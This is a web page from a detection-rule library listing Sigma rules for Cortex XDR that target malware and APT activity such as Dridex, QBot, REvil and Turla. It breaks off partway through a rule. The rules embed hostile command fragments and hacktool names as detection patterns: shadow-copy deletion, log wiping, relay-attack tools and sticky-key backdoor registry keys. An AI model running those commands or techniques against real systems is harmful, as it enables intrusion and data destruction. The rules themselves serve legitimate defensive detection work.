Tool
EDR / XDR
Palo Alto Cortex XDR
1,524 rules · Sigma detections in Palo Alto Cortex XDR syntax
The same Sigma detection corpus, machine-rendered into Palo Alto Cortex XDR query syntax and ready to paste. Switch platforms above for identical coverage in another language, or choose Sigma (generic) for the portable YAML.
Download all 1,524 rules (.zip, 675 KB)
Every Palo Alto Cortex XDR query in this view, packaged to deploy.
Filter by techniquepick techniques from the ATT&CK matrix
Reconnaissance4
Resource Development5
Initial Access7
Execution25
Persistence31
Privilege Escalation17
Stealth63
Defense Impairment16
Credential Access26
Discovery24
Lateral Movement10
Collection11
Command and Control18
Exfiltration7
Impact10
Using these Sigma rules
Deploy. Pick your SIEM above and paste the rendered query straight into a saved search or detection rule, or expand any rule to convert its generic YAML inline to the language you run.
Adapt. Map the field names to your log schema - Sigma assumes a normalised taxonomy - and tune thresholds and timeframes to your own baseline before you trust the alert.
Validate. Every rule is mapped to ATT&CK, so run the matching Atomic Red Team test on /atomic to confirm the rule actually fires before you rely on it.
Judge. Each rule shows a quality tier (Strong / Moderate / Basic) and an estimated alert-volume tier (Low / Medium / High FP), both scored deterministically from the rule's shape - status, detection depth, match breadth, log source, documented false positives and references. A rule existing is not the same as a rule being good, or being quiet; hover either tier for the breakdown. The FP estimate reads rule shape, not a measured rate, so use it to pick what to tune first before you deploy.
◈
Detection rules
50 shown of 1,524
critical
Strong
Medium FP
Potential Dridex Activity
Detects potential Dridex acitvity via specific process patterns
view Sigma YAML
title: Potential Dridex Activity
id: e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e
status: stable
description: Detects potential Dridex acitvity via specific process patterns
references:
- https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3
- https://redcanary.com/threat-detection-report/threats/dridex/
author: Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)
date: 2019-01-10
modified: 2023-02-03
tags:
- attack.privilege-escalation
- attack.stealth
- attack.t1055
- attack.discovery
- attack.t1135
- attack.t1033
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_svchost:
Image|endswith: '\svchost.exe'
CommandLine|contains|all:
- 'C:\Users\'
- '\Desktop\'
filter_svchost:
ParentImage|startswith: 'C:\Windows\System32\'
selection_regsvr:
ParentImage|endswith: '\excel.exe'
Image|endswith: '\regsvr32.exe'
CommandLine|contains:
- ' -s '
- '\AppData\Local\Temp\'
filter_regsvr:
CommandLine|contains: '.dll'
selection_anomaly_parent:
ParentImage|endswith: '\svchost.exe'
selection_anomaly_child_1:
Image|endswith: '\whoami.exe'
CommandLine|contains: ' /all'
selection_anomaly_child_2:
Image|endswith:
- '\net.exe'
- '\net1.exe'
CommandLine|contains: ' view'
condition: (selection_svchost and not filter_svchost) or (selection_regsvr and not filter_regsvr) or (selection_anomaly_parent and 1 of selection_anomaly_child_*)
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Strong
Medium FP
Potential Dtrack RAT Activity
Detects potential Dtrack RAT activity via specific process patterns
view Sigma YAML
title: Potential Dtrack RAT Activity
id: f1531fa4-5b84-4342-8f68-9cf3fdbd83d4
status: stable
description: Detects potential Dtrack RAT activity via specific process patterns
references:
- https://securelist.com/my-name-is-dtrack/93338/
- https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/
- https://www.cyberbit.com/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/
- https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/
- https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2019-10-30
modified: 2025-11-03
tags:
- attack.impact
- attack.t1490
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_ping:
CommandLine|re: 'ping\s+-n.{6,64}echo EEEE\s?>\s?'
selection_ipconfig:
CommandLine|re: 'ipconfig\s+/all'
CommandLine|contains: '\temp\res.ip'
selection_netsh:
CommandLine|contains|all:
- 'interface ip show config'
- '\temp\netsh.res'
condition: 1 of selection_*
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Strong
Medium FP
Potential Maze Ransomware Activity
Detects specific process characteristics of Maze ransomware word document droppers
view Sigma YAML
title: Potential Maze Ransomware Activity
id: 29fd07fc-9cfd-4331-b7fd-cc18dfa21052
status: test
description: Detects specific process characteristics of Maze ransomware word document droppers
references:
- https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
- https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/
- https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/
author: Florian Roth (Nextron Systems)
date: 2020-05-08
modified: 2023-02-13
tags:
- attack.execution
- attack.t1204.002
- attack.t1047
- attack.impact
- attack.t1490
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
# Dropper
selection1:
ParentImage|endswith: '\WINWORD.exe'
Image|endswith: '.tmp'
# Binary Execution
selection2:
Image|endswith: '\wmic.exe'
ParentImage|contains: '\Temp\'
CommandLine|endswith: 'shadowcopy delete'
# Specific Pattern
selection3:
CommandLine|endswith: 'shadowcopy delete'
CommandLine|contains: '\..\..\system32'
condition: 1 of selection*
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Strong
Medium FP
Potential QBot Activity
Detects potential QBot activity by looking for process executions used previously by QBot
view Sigma YAML
title: Potential QBot Activity
id: 4fcac6eb-0287-4090-8eea-2602e4c20040
status: stable
description: Detects potential QBot activity by looking for process executions used previously by QBot
references:
- https://twitter.com/killamjr/status/1179034907932315648
- https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/
author: Florian Roth (Nextron Systems)
date: 2019-10-01
modified: 2023-02-03
tags:
- attack.execution
- attack.t1059.005
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection1:
ParentImage|endswith: '\WinRAR.exe'
Image|endswith: '\wscript.exe'
selection2:
CommandLine|contains: ' /c ping.exe -n 6 127.0.0.1 & type '
selection3:
CommandLine|contains|all:
- 'regsvr32.exe'
- 'C:\ProgramData'
- '.tmp'
condition: 1 of selection*
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Strong
High FP
Potential Russian APT Credential Theft Activity
Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
view Sigma YAML
title: Potential Russian APT Credential Theft Activity
id: b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee
status: stable
description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
references:
- https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html
author: Florian Roth (Nextron Systems)
date: 2019-02-21
modified: 2023-03-08
tags:
- attack.credential-access
- attack.t1552.001
- attack.t1003.003
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_xcopy:
CommandLine|contains|all:
- 'xcopy /S /E /C /Q /H \\\\'
- '\sysvol\'
selection_adexplorer:
CommandLine|contains|all:
- 'adexplorer -snapshot "" c:\users\'
- '\downloads\'
- '.snp'
condition: 1 of selection_*
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Strong
Medium FP
Potential SMB Relay Attack Tool Execution
Detects different hacktools used for relay attacks on Windows for privilege escalation
view Sigma YAML
title: Potential SMB Relay Attack Tool Execution
id: 5589ab4f-a767-433c-961d-c91f3f704db1
status: test
description: Detects different hacktools used for relay attacks on Windows for privilege escalation
references:
- https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/
- https://pentestlab.blog/2017/04/13/hot-potato/
- https://github.com/ohpe/juicy-potato
- https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes
- https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire
- https://www.localpotato.com/
author: Florian Roth (Nextron Systems)
date: 2021-07-24
modified: 2023-02-14
tags:
- attack.collection
- attack.execution
- attack.credential-access
- attack.t1557.001
logsource:
category: process_creation
product: windows
detection:
selection_pe:
Image|contains:
- 'PetitPotam'
- 'RottenPotato'
- 'HotPotato'
- 'JuicyPotato'
- '\just_dce_'
- 'Juicy Potato'
- '\temp\rot.exe'
- '\Potato.exe'
- '\SpoolSample.exe'
- '\Responder.exe'
- '\smbrelayx'
- '\ntlmrelayx'
- '\LocalPotato'
selection_script:
CommandLine|contains:
- 'Invoke-Tater'
- ' smbrelay'
- ' ntlmrelay'
- 'cme smb '
- ' /ntlm:NTLMhash '
- 'Invoke-PetitPotam'
- '.exe -t * -p ' # JuicyPotatoNG pattern https://github.com/antonioCoco/JuicyPotatoNG
selection_juicypotato_enum: # appears when JuicyPotatoNG is used with -b
CommandLine|contains: '.exe -c "{'
CommandLine|endswith: '}" -z'
filter_hotpotatoes: # known goodware https://hotpot.uvic.ca/
Image|contains:
- 'HotPotatoes6'
- 'HotPotatoes7'
- 'HotPotatoes ' # Covers the following: 'HotPotatoes 6', 'HotPotatoes 7', 'HotPotatoes Help', 'HotPotatoes Tutorial'
condition: 1 of selection_* and not 1 of filter_*
falsepositives:
- Legitimate files with these rare hacktool names
level: critical
Convert to SIEM query
critical
Moderate
High FP
Potential SharePoint ToolShell CVE-2025-53770 Exploitation - File Create
Detects the creation of file such as spinstall0.aspx which may indicate successful exploitation of CVE-2025-53770.
CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution.
view Sigma YAML
title: Potential SharePoint ToolShell CVE-2025-53770 Exploitation - File Create
id: ba479447-721f-42a9-9af2-6dcd517bbdb3
status: experimental
description: |
Detects the creation of file such as spinstall0.aspx which may indicate successful exploitation of CVE-2025-53770.
CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution.
references:
- https://research.eye.security/sharepoint-under-siege/
- https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/
- https://unit42.paloaltonetworks.com/microsoft-sharepoint-cve-2025-49704-cve-2025-49706-cve-2025-53770/
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-07-21
modified: 2025-07-24
tags:
- attack.initial-access
- attack.t1190
- cve.2025-53770
- detection.emerging-threats
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|startswith:
- 'C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\'
- 'C:\Program Files (x86)\Common Files\Microsoft Shared\Web Server Extensions\'
TargetFilename|contains:
- '\15\TEMPLATE\LAYOUTS\'
- '\16\TEMPLATE\LAYOUTS\'
TargetFilename|endswith:
- '\spinstall.aspx'
- '\spinstall?.aspx'
- '\debug_dev.js'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Moderate
High FP
Potential SystemNightmare Exploitation Attempt
Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM
view Sigma YAML
title: Potential SystemNightmare Exploitation Attempt
id: c01f7bd6-0c1d-47aa-9c61-187b91273a16
status: test
description: Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM
references:
- https://github.com/GossiTheDog/SystemNightmare
author: Florian Roth (Nextron Systems)
date: 2021-08-11
modified: 2023-02-04
tags:
- attack.privilege-escalation
- attack.t1068
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- 'printnightmare.gentilkiwi.com'
- ' /user:gentilguest '
- 'Kiwi Legit Printer'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Strong
Medium FP
PrinterNightmare Mimikatz Driver Name
Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527
view Sigma YAML
title: PrinterNightmare Mimikatz Driver Name
id: ba6b9e43-1d45-4d3c-a504-1043a64c8469
status: test
description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527
references:
- https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760
- https://www.lexjansen.com/sesug/1993/SESUG93035.pdf
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913
- https://nvd.nist.gov/vuln/detail/cve-2021-1675
- https://nvd.nist.gov/vuln/detail/cve-2021-34527
author: Markus Neis, @markus_neis, Florian Roth
date: 2021-07-04
modified: 2023-06-12
tags:
- attack.execution
- attack.t1204
- cve.2021-1675
- cve.2021-34527
- detection.emerging-threats
logsource:
product: windows
category: registry_event
detection:
selection:
TargetObject|contains:
- '\Control\Print\Environments\Windows x64\Drivers\Version-3\QMS 810\'
- '\Control\Print\Environments\Windows x64\Drivers\Version-3\mimikatz'
selection_alt:
TargetObject|contains|all:
- 'legitprinter'
- '\Control\Print\Environments\Windows'
selection_print:
TargetObject|contains:
- '\Control\Print\Environments'
- '\CurrentVersion\Print\Printers'
selection_kiwi:
TargetObject|contains:
- 'Gentil Kiwi'
- 'mimikatz printer'
- 'Kiwi Legit Printer'
condition: selection or selection_alt or (selection_print and selection_kiwi)
falsepositives:
- Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)
level: critical
Convert to SIEM query
critical
Strong
Medium FP
Qakbot Rundll32 Exports Execution
Detects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity.
view Sigma YAML
title: Qakbot Rundll32 Exports Execution
id: 339ed3d6-5490-46d0-96a7-8abe33078f58
status: test
description: Detects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity.
references:
- https://github.com/pr0xylife/Qakbot/
author: X__Junior (Nextron Systems)
date: 2023-05-24
modified: 2023-05-30
tags:
- attack.execution
- detection.emerging-threats
- attack.stealth
logsource:
product: windows
category: process_creation
detection:
selection_paths:
ParentImage|endswith:
# Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware
- '\cmd.exe'
- '\cscript.exe'
- '\curl.exe'
- '\mshta.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\wscript.exe'
Image|endswith: '\rundll32.exe'
CommandLine|contains:
# Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware
- ':\ProgramData\'
- ':\Users\Public\'
- '\AppData\Local\Temp\'
- '\AppData\Roaming\'
selection_exports:
CommandLine|endswith:
# Note: Only add additional exports seen used by Qakbot
- 'aslr' # https://tria.ge/230524-scgq9add9v/behavioral1#report
- 'bind'
- 'DrawThemeIcon'
- 'GG10'
- 'GL70'
- 'jhbvygftr'
- 'kjhbhkjvydrt'
- 'LS88'
- 'Motd'
- 'N115'
- 'next' # https://tria.ge/230530-n3rxpahf9w/behavioral2
- 'Nikn'
- 'print'
- 'qqqb'
- 'qqqq'
- 'RS32'
- 'Test'
- 'Time'
- 'Updt'
- 'vips'
- 'Wind'
- 'WW50'
- 'X555'
- 'XL55'
- 'xlAutoOpen'
- 'XS88'
condition: all of selection_*
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
Medium FP
Qakbot Rundll32 Fake DLL Extension Execution
Detects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity.
view Sigma YAML
title: Qakbot Rundll32 Fake DLL Extension Execution
id: bfd34392-c591-4009-b938-9fd985a28b85
status: test
description: Detects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity.
references:
- https://github.com/pr0xylife/Qakbot/
author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-24
tags:
- attack.execution
- detection.emerging-threats
- attack.stealth
logsource:
product: windows
category: process_creation
detection:
selection:
ParentImage|endswith:
# Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware
- '\cmd.exe'
- '\cscript.exe'
- '\curl.exe'
- '\mshta.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\wscript.exe'
Image|endswith: '\rundll32.exe'
CommandLine|contains:
# Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware
- ':\ProgramData\'
- ':\Users\Public\'
- '\AppData\Local\Temp\'
- '\AppData\Roaming\'
filter_main_extension:
CommandLine|contains: '.dll'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Strong
Medium FP
REvil Kaseya Incident Malware Patterns
Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)
view Sigma YAML
title: REvil Kaseya Incident Malware Patterns
id: 5de632bc-7fbd-4c8a-944a-fce55c59eae5
status: test
description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)
references:
- https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers
- https://www.joesandbox.com/analysis/443736/0/html
- https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b
- https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/
- https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/
author: Florian Roth (Nextron Systems)
date: 2021-07-03
modified: 2022-05-20
tags:
- attack.execution
- attack.t1059
- attack.g0115
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection1:
CommandLine|contains:
- 'C:\Windows\cert.exe'
- 'del /q /f c:\kworking\agent.crt'
- 'Kaseya VSA Agent Hot-fix'
- '\AppData\Local\Temp\MsMpEng.exe'
- 'rmdir /s /q %SystemDrive%\inetpub\logs'
- 'del /s /q /f %SystemDrive%\\*.log'
- 'c:\kworking1\agent.exe'
- 'c:\kworking1\agent.crt'
selection2:
Image:
- 'C:\Windows\MsMpEng.exe'
- 'C:\Windows\cert.exe'
- 'C:\kworking\agent.exe'
- 'C:\kworking1\agent.exe'
selection3:
CommandLine|contains|all:
- 'del /s /q /f'
- 'WebPages\Errors\webErrorLog.txt'
condition: 1 of selection*
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Moderate
High FP
RedSun - TieringEngineService.exe Staged in RS-Prefixed Temp Dir
Detects the creation of a file named TieringEngineService.exe inside a directory whose path contains the RS- prefix characteristic
of RedSun's staging directory (e.g. %TEMP%\RS-{GUID}\TieringEngineService.exe).
RedSun registers a Cloud Files sync root under this RS-prefixed path and drops a masqueraded placeholder there as part of its oplock-based AV bypass and privilege escalation chain.
The RS-{GUID} directory name is generated by RedSun itself and has no legitimate system usage,
making the combination of this path prefix and the TieringEngineService.exe filename a highly
specific indicator of RedSun activity.
view Sigma YAML
title: RedSun - TieringEngineService.exe Staged in RS-Prefixed Temp Dir
id: f2e4b7d9-5c3a-4f8b-9e1d-7a6c2b3f4e5d
status: experimental
description: |
Detects the creation of a file named TieringEngineService.exe inside a directory whose path contains the RS- prefix characteristic
of RedSun's staging directory (e.g. %TEMP%\RS-{GUID}\TieringEngineService.exe).
RedSun registers a Cloud Files sync root under this RS-prefixed path and drops a masqueraded placeholder there as part of its oplock-based AV bypass and privilege escalation chain.
The RS-{GUID} directory name is generated by RedSun itself and has no legitimate system usage,
making the combination of this path prefix and the TieringEngineService.exe filename a highly
specific indicator of RedSun activity.
references:
- https://github.com/Nightmare-Eclipse/RedSun/blob/7456cc8cf066f5e5fc6cdf7d3272a466ebd6b2f6/RedSun.cpp#L591
- https://deadeclipse666.blogspot.com/2026/04/public-disclosure-response-for-cve-2026.html
author: Swachchhanda Shrawan Poudel (Nextron Systems), @unresolvedhost
date: 2026-04-17
tags:
- attack.stealth
- attack.t1036.005
- detection.emerging-threats
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|contains|all:
- '\Temp'
- '\RS-{'
TargetFilename|endswith: '\TieringEngineService.exe'
condition: selection
falsepositives:
- Unlikely
level: critical
regression_tests_path: regression_data/rules-emerging-threats/2026/Exploits/RedSun/file_event_win_exploit_redsun_indicators/info.yml
Convert to SIEM query
critical
Moderate
Medium FP
Rorschach Ransomware Execution Activity
Detects Rorschach ransomware execution activity
view Sigma YAML
title: Rorschach Ransomware Execution Activity
id: 0e9e6c63-1350-48c4-9fa1-7ccb235edc68
status: test
description: Detects Rorschach ransomware execution activity
references:
- https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/
author: X__Junior (Nextron Systems)
date: 2023-04-04
modified: 2023-04-22
tags:
- attack.execution
- attack.t1059.003
- attack.t1059.001
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\bcdedit.exe'
- '\net.exe'
- '\net1.exe'
- '\netsh.exe'
- '\wevtutil.exe'
- '\vssadmin.exe'
CommandLine|contains: '11111111'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
Medium FP
SNAKE Malware Kernel Driver File Indicator
Detects SNAKE malware kernel driver file indicator
view Sigma YAML
title: SNAKE Malware Kernel Driver File Indicator
id: d6d9d23f-69c1-41b5-8305-fa8250bd027f
status: test
description: Detects SNAKE malware kernel driver file indicator
references:
- https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-10
tags:
- attack.execution
- detection.emerging-threats
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename: 'C:\Windows\System32\Com\Comadmin.dat'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
Medium FP
Serv-U Exploitation CVE-2021-35211 by DEV-0322
Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322
view Sigma YAML
title: Serv-U Exploitation CVE-2021-35211 by DEV-0322
id: 75578840-9526-4b2a-9462-af469a45e767
status: test
description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322
references:
- https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/
author: Florian Roth (Nextron Systems)
date: 2021-07-14
modified: 2022-12-18
tags:
- attack.persistence
- attack.t1136.001
- cve.2021-35211
- detection.emerging-threats
# - threat_group.DEV-0322
logsource:
category: process_creation
product: windows
detection:
selection_whoami:
CommandLine|contains: 'whoami'
selection_cmd_1:
CommandLine|contains:
- './Client/Common/'
- '.\Client\Common\'
selection_cmd_2:
CommandLine|contains: 'C:\Windows\Temp\Serv-U.bat'
condition: selection_whoami and 1 of selection_cmd*
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
High FP
Sticky Key Like Backdoor Execution
Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
view Sigma YAML
title: Sticky Key Like Backdoor Execution
id: 2fdefcb3-dbda-401e-ae23-f0db027628bc
related:
- id: baca5663-583c-45f9-b5dc-ea96a22ce542
type: derived
status: test
description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
references:
- https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors
author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
date: 2018-03-15
modified: 2023-03-07
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1546.008
- car.2014-11-003
- car.2014-11-008
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\winlogon.exe'
Image|endswith:
- '\cmd.exe'
- '\cscript.exe'
- '\mshta.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\regsvr32.exe'
- '\rundll32.exe'
- '\wscript.exe'
- '\wt.exe'
CommandLine|contains:
- 'sethc.exe'
- 'utilman.exe'
- 'osk.exe'
- 'Magnify.exe'
- 'Narrator.exe'
- 'DisplaySwitch.exe'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
High FP
Sticky Key Like Backdoor Usage - Registry
Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
view Sigma YAML
title: Sticky Key Like Backdoor Usage - Registry
id: baca5663-583c-45f9-b5dc-ea96a22ce542
status: test
description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
references:
- https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/
- https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/
author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
date: 2018-03-15
modified: 2022-11-26
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1546.008
- car.2014-11-003
- car.2014-11-008
logsource:
category: registry_event
product: windows
detection:
selection_registry:
TargetObject|endswith:
- '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger'
- '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger'
- '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\Debugger'
- '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe\Debugger'
- '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe\Debugger'
- '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe\Debugger'
- '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe\Debugger'
- '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe\Debugger'
condition: selection_registry
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Strong
Medium FP
Suspicious Child Process Of Veeam Dabatase
Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
view Sigma YAML
title: Suspicious Child Process Of Veeam Dabatase
id: d55b793d-f847-4eea-b59a-5ab09908ac90
related:
- id: 869b9ca7-9ea2-4a5a-8325-e80e62f75445
type: similar
status: test
description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
references:
- https://labs.withsecure.com/publications/fin7-target-veeam-servers
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-04
tags:
- attack.initial-access
- attack.persistence
- attack.privilege-escalation
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith: '\sqlservr.exe'
ParentCommandLine|contains: 'VEEAMSQL'
selection_child_1:
Image|endswith:
- '\cmd.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\wsl.exe'
- '\wt.exe'
CommandLine|contains:
- '-ex '
- 'bypass'
- 'cscript'
- 'DownloadString'
- 'http://'
- 'https://'
- 'mshta'
- 'regsvr32'
- 'rundll32'
- 'wscript'
- 'copy '
selection_child_2:
Image|endswith:
- '\net.exe'
- '\net1.exe'
- '\netstat.exe'
- '\nltest.exe'
- '\ping.exe'
- '\tasklist.exe'
- '\whoami.exe'
condition: selection_parent and 1 of selection_child_*
level: critical
Convert to SIEM query
critical
Moderate
High FP
Suspicious PowerShell Mailbox Export to Share
Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations
view Sigma YAML
title: Suspicious PowerShell Mailbox Export to Share
id: 889719ef-dd62-43df-86c3-768fb08dc7c0
status: test
description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations
references:
- https://youtu.be/5mqid-7zp8k?t=2481
- https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
- https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
- https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/
author: Florian Roth (Nextron Systems)
date: 2021-08-07
modified: 2022-10-26
tags:
- attack.exfiltration
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- 'New-MailboxExportRequest'
- ' -Mailbox '
- ' -FilePath \\\\'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Moderate
High FP
TrustedPath UAC Bypass Pattern
Detects indicators of a UAC bypass method by mocking directories
view Sigma YAML
title: TrustedPath UAC Bypass Pattern
id: 4ac47ed3-44c2-4b1f-9d51-bf46e8914126
related:
- id: 0cbe38c0-270c-41d9-ab79-6e5a9a669290
type: similar
status: test
description: Detects indicators of a UAC bypass method by mocking directories
references:
- https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e
- https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows
- https://github.com/netero1010/TrustedPath-UACBypass-BOF
- https://x.com/Wietze/status/1933495426952421843
author: Florian Roth (Nextron Systems)
date: 2021-08-27
modified: 2025-06-17
tags:
- attack.privilege-escalation
- attack.t1548.002
logsource:
category: process_creation
product: windows
detection:
selection:
Image|contains:
- 'C:\Windows \System32\'
- 'C:\Windows \SysWOW64\'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Moderate
Medium FP
Turla Group Commands May 2020
Detects commands used by Turla group as reported by ESET in May 2020
view Sigma YAML
title: Turla Group Commands May 2020
id: 9e2e51c5-c699-4794-ba5a-29f5da40ac0c
status: test
description: Detects commands used by Turla group as reported by ESET in May 2020
references:
- https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
author: Florian Roth (Nextron Systems)
date: 2020-05-26
modified: 2025-10-19
tags:
- attack.privilege-escalation
- attack.persistence
- attack.stealth
- attack.g0010
- attack.execution
- attack.t1059.001
- attack.t1053.005
- attack.t1027
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_cli_1:
CommandLine|contains:
- 'tracert -h 10 yahoo.com'
